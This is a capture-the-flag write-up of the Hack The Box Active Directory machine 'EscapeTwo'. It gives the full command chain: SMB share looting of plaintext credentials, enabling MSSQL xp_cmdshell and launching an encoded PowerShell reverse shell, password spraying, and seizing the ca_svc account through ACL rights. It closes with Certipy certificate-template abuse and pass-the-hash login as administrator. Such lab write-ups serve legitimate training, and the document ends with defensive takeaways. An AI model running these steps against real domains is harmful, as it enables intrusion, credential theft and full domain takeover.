EscapeTwo AD
Machine Information
The initial access was straightforward, as the machine's description provided a username and password. Using these credentials, further enumeration was performed with crackmapexe to discover additional users. File shares were also checked for readable content, leading to an SMB share that contained an XLS file. Upon inspection, the file held credentials for another user.
The most interesting service was MSSQL, which was leveraged using Impacket to extract configuration files, revealing another password. A password spray attack with crackmapexe helped identify the corresponding user.
For privilege escalation, the user had Active Directory Rights Overwrite privileges. By assigning Ryan to this privilege and using Certipy, administrative access was obtained, leading to full system compromise.
Challenge Information
Name: EscapeTwo
Platform: Hack The Box (HTB)
Category: Active Directory (Windows)
Difficulty: Easy
Objective: Exploit Active Directory to retrieve the flag.
Tags:
smbclient,evil-winrm,certipyKey Exploit: Active Directory Rights Overwrite
Machine Information
IP Address:
10.10.11.51Domain:
sequel.htbDomain Controller:
DC01.sequel.htbInitial Credentials:
rose / KxEPkKe6R8su
Enumeration
nmap
A full port scan was conducted to identify open services.
nmap -sC -sV -p- 10.10.11.51
Discovered Open Ports & Services:
53
DNS
Domain Name System
88
Kerberos
Authentication Service
135
RPC
Remote Procedure Call
139
NetBIOS
File Sharing Service
389
LDAP
Active Directory Queries
445
SMB
File Share Access
1433
MSSQL
Microsoft SQL Server 2019
5985
WinRM
Windows Remote Management
Key Finding:
The machine is part of an Active Directory domain:
sequel.htb.A Microsoft SQL Server 2019 instance is running.
SMB and LDAP services indicate potential credential leaks.
Before proceeding with enumeration and exploitation, add the target machine’s IP and domain name to /etc/hosts for easier interaction with services.
echo "10.10.11.51 sequel.htb dc01.sequel.htb" | sudo tee -a /etc/hosts
Initial Access
The challenge description provided the initial credentials:
Username: rose
Password: KxEPkKe6R8su Using crackmapexec, additional enumeration was performed.
nxc smb sequel.htb -u 'rose' -p 'KxEPkKe6R8su' --shares
SMB Enumeration
The Accounting Department SMB share contained an XLS file, which was retrieved and analyzed.
smbclient \\sequel.htb\Accounting Department -U rose
mget *
By extracting the contents of the XLS file, additional credentials were discovered:
angela : 0fwz7Q4mSpurIt99
oscar : 86LxLBMgEWaKUnBG
kevin : Md9Wlq1E5bZnVDVo
sa : MSSQLP@ssw0rd!Exploiting MSSQL for Shell Access
xp_cmdshell { 'command_string' } [ , NO_OUTPUT ]
Using impacket-mssqlclient, a connection was established using the extracted sa credentials.
impacket-mssqlclient sa:"password"@sequel.htbEnabling xp_cmdshell
The xp_cmdshell feature was enabled to execute system commands.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;Gaining a Reverse Shell
A PowerShell reverse shell was executed using Nishang.
With an active shell, further enumeration led to the discovery of SQL2019 configuration files, which contained plaintext credentials.
xp_cmdshell 'powershell -enc <<base64_payload>>'
Privilege Escalation – Active Directory Rights Overwrite
Identifying New Credentials
After obtaining a new set of credentials, a password-spraying attack using crackmapexec identified the associated user:
crackmapexec smb sequel.htb -u all_users.txt -p 'WqSZAF6CysDQbGb3'
Ryan was successfully authenticated.Identifying Privileges
Using PowerView, Ryan’s privileges were examined:
Get-DomainUser -Identity ryan -Select ObjectSid
Get-DomainObjectAcl -ResolveGUIDs -SecurityIdentifier S-1-5-21-548670397-972687484-3496335370-1114
Ryan had Active Directory Rights Overwrite privileges, which allowed control over the ca_svc account.
Assigning Ryan as Owner
Assign Ryan as ownership in ca_svc account.
Set-DomainObjectOwner -TargetIdentity ca_svc -PrincipalIdentity ryan
Add-DomainObjectAcl -TargetIdentity ca_svc -PrincipalIdentity ryan -Rights fullcontroAs clean-up script from the machine, need to re-run this step multiple times.
Certificate-Based Authentication (Certipy)
With ca_svc access, Certipy was used to request a certificate for administrator authentication.
certipy-ad shadow auto -u ryan@sequel.htb -p 'WqSZAF6CysDQbGb3' -dc-ip 10.10.11.51 -ns 10.10.11.51 -target dc01.sequel.htb -account ca_svc
Fix this using,
in root term >> timedatectl set-ntp off; ntpdate {dc_ip}
Re-run the ownership assignment:
KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad find -scheme ldap -k -debug -target dc01.sequel.htb -dc-ip 10.10.11.51 -vulnerable -stdout
KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad template -k -template DunderMifflinAuthentication -target dc01.sequel.htb -dc-ip 10.10.11.51
Requesting a Certificate for Administrator Access
certipy-ad req -u ca_svc -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -ca sequel-DC01-CA -target sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51 -debug
Authenticating as Administrator
certipy-ad auth -pfx ./administrator_10.pfx -dc-ip 10.10.11.51
Using Evil-WinRM, administrator access was established:
evilwinrm -i dc01.sequel.htb -i administrator -H {admin_hash}
Conclusion
This machine demonstrated the importance of securing Active Directory Certificate Services (ADCS) and MSSQL xp_cmdshell. Key takeaways:
Avoid embedding plaintext credentials in files.
Restrict SMB access to authenticated and authorized users.
Disable unnecessary SQL Server features like xp_cmdshell.
Monitor Active Directory rights assignments, especially over critical accounts.
This was an engaging Active Directory exploitation challenge that emphasized SMB enumeration, password spraying, SQL abuse, and AD certificate misconfigurations.
Last updated